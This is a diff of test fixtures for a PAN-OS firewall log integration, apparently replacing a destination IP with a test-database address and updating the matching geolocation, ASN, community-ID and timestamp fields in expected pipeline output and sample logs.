- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -12157,14 +12224,14 @@
 "port": 53167,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12179,7 +12246,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:lGMn2sEJLK3qbOX02axD1srH/FY="
+ "community_id": "1:RUiMBKQK4uJwkgGvy/lHSKWl7+I="
 }
 },
 "threat_category": "unknown",
@@ -12224,8 +12291,8 @@
 ],
 "network": {
 "community_id": [
- "1:L9I6mLjr15WmWcGfC1vPrN0NmY0=",
- "1:lGMn2sEJLK3qbOX02axD1srH/FY="
+ "1:Ve4ZkzmH8R7lZ6DKyWn68RpdUWQ=",
+ "1:RUiMBKQK4uJwkgGvy/lHSKWl7+I="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12264,14 +12331,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768448623Z",
- "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692092300Z",
+ "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12294,29 +12361,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -12332,14 +12398,14 @@
 "port": 53150,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12354,7 +12420,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:O1zDnt5d52xTreiMgL/sHMRHiXA="
+ "community_id": "1:dCXhS8309UIWHnl2I7g54l1ldX0="
 }
 },
 "threat_category": "unknown",
@@ -12399,8 +12465,8 @@
 ],
 "network": {
 "community_id": [
- "1:pvzPjqjqA6kLTjxiRDVSDxuidwg=",
- "1:O1zDnt5d52xTreiMgL/sHMRHiXA="
+ "1:t61IasNCmSlxNdbvrIRLnSj8P8I=",
+ "1:dCXhS8309UIWHnl2I7g54l1ldX0="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12439,14 +12505,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768452536Z",
- "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692097900Z",
+ "original": "Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12469,29 +12535,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -12507,14 +12572,14 @@
 "port": 53185,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12529,7 +12594,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:CwNRTMQumfdoC3msd4z5PIYkKLU="
+ "community_id": "1:iq5uEAaFQc5l1+/OuriPsYrj2wA="
 }
 },
 "threat_category": "unknown",
@@ -12574,8 +12639,8 @@
 ],
 "network": {
 "community_id": [
- "1:hu8p8gkxiimZqTLhIkgVfSePEqk=",
- "1:CwNRTMQumfdoC3msd4z5PIYkKLU="
+ "1:Cro8B/f5RUAAARORnPh3Efkv5Hk=",
+ "1:iq5uEAaFQc5l1+/OuriPsYrj2wA="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12614,14 +12679,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768456420Z",
- "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692102700Z",
+ "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:28.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12644,29 +12709,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -12682,14 +12746,14 @@
 "port": 53187,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12704,7 +12768,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:0YBp8myYbHSoKWG2HvxutMfose0="
+ "community_id": "1:hYJDTtHYwuZS9LNRhS93bXtUgEA="
 }
 },
 "threat_category": "unknown",
@@ -12749,8 +12813,8 @@
 ],
 "network": {
 "community_id": [
- "1:z12wzV1bKYppHPfC9LypWH+RtE4=",
- "1:0YBp8myYbHSoKWG2HvxutMfose0="
+ "1:L0CSnMLNIOPq4WYcZWeedd+iR9A=",
+ "1:hYJDTtHYwuZS9LNRhS93bXtUgEA="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12789,14 +12853,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768460392Z",
- "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692107500Z",
+ "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:28.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12819,29 +12883,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -12857,14 +12920,14 @@
 "port": 53188,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12879,7 +12942,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:CQrsQ2CJN8/aVtRj6kkSqGiLA4w="
+ "community_id": "1:VgbZDN+X/hs0C2xqRLVy6lzVPcE="
 }
 },
 "threat_category": "unknown",
@@ -12924,8 +12987,8 @@
 ],
 "network": {
 "community_id": [
- "1:eJYKKiIqzYxe5ja/6/hDB3CgzSI=",
- "1:CQrsQ2CJN8/aVtRj6kkSqGiLA4w="
+ "1:++UGx6mUPvQ+gttOfjNaZwJECq8=",
+ "1:VgbZDN+X/hs0C2xqRLVy6lzVPcE="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12964,14 +13027,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768464585Z",
- "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692112200Z",
+ "original": "Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:28.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12994,29 +13057,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -13032,14 +13094,14 @@
 "port": 53178,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -13054,7 +13116,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:vbknc+k7pE33+aNpIggpIzlC7MY="
+ "community_id": "1:LIyOLbs2SFX0VKFvnleMeqez0os="
 }
 },
 "threat_category": "unknown",
@@ -13099,8 +13161,8 @@
 ],
 "network": {
 "community_id": [
- "1:f+00RNTWn2IGrM2JmEAnEPoRwDg=",
- "1:vbknc+k7pE33+aNpIggpIzlC7MY="
+ "1:iP4eZk++bEMf07vSZ4W2/LKY1jc=",
+ "1:LIyOLbs2SFX0VKFvnleMeqez0os="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -13139,14 +13201,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768468595Z",
- "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692116100Z",
+ "original": "Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:29.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log
index c3e74310f06..ba304bf40ac 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log
@@ -1,100 +1,100 @@
-Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
